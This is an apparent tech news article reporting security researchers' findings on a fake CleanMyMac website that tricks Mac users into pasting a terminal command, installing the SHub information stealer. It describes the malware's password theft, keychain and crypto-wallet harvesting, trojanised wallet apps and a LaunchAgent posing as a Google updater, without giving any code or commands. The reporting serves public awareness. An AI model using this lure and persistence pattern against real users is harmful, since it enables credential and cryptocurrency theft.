- Fake CleanMyMac Utility Spreads SHub Information Stealer
- Attack tricks users into pasting terminal commands
- Malware steals credentials and cryptocurrency and persists through a backdoor
A fake Mac utility program is tricking users into installing information-stealing malware that leaks passwords, sensitive files and even money, experts have warned.
Security researchers Malwarebytes said the program was part of a broader, highly sophisticated campaign that also included a custom website, reputable brand spoofing, a loader, and the old ClickFix approach.
Researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program created by MacPaw, by creating a nearly identical website on cleanmymacos.[DOT]org, making it easy for people to confuse it with the real thing. However, instead of simply downloading and running an installer, victims are asked to open a terminal and paste a command that retrieves the payload from a third-party server.
Article continues below.
Steal files and establish persistence
“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarial verifications, and XProtect offer little protection once the user pastes the command and presses Return.”
The malware that is installed this way is called SHub, and during installation it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and might seem like something an advanced user would do, users might dismiss it as standard practice, the researchers explained.
However, the password actually gives SHub access to the macOS keychain, Wi-Fi credentials, app tokens, and other private keys.
“With the password in hand, SHub begins a systematic sweep of the machine,” Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files and other valuables, it launches a stage two backdoor that replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even allows for more cryptocurrency thefts in the future.
Finally, criminals would install a LaunchAgent by spoofing a Google update service.
“In practice, this gives attackers the ability to execute commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concludes.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
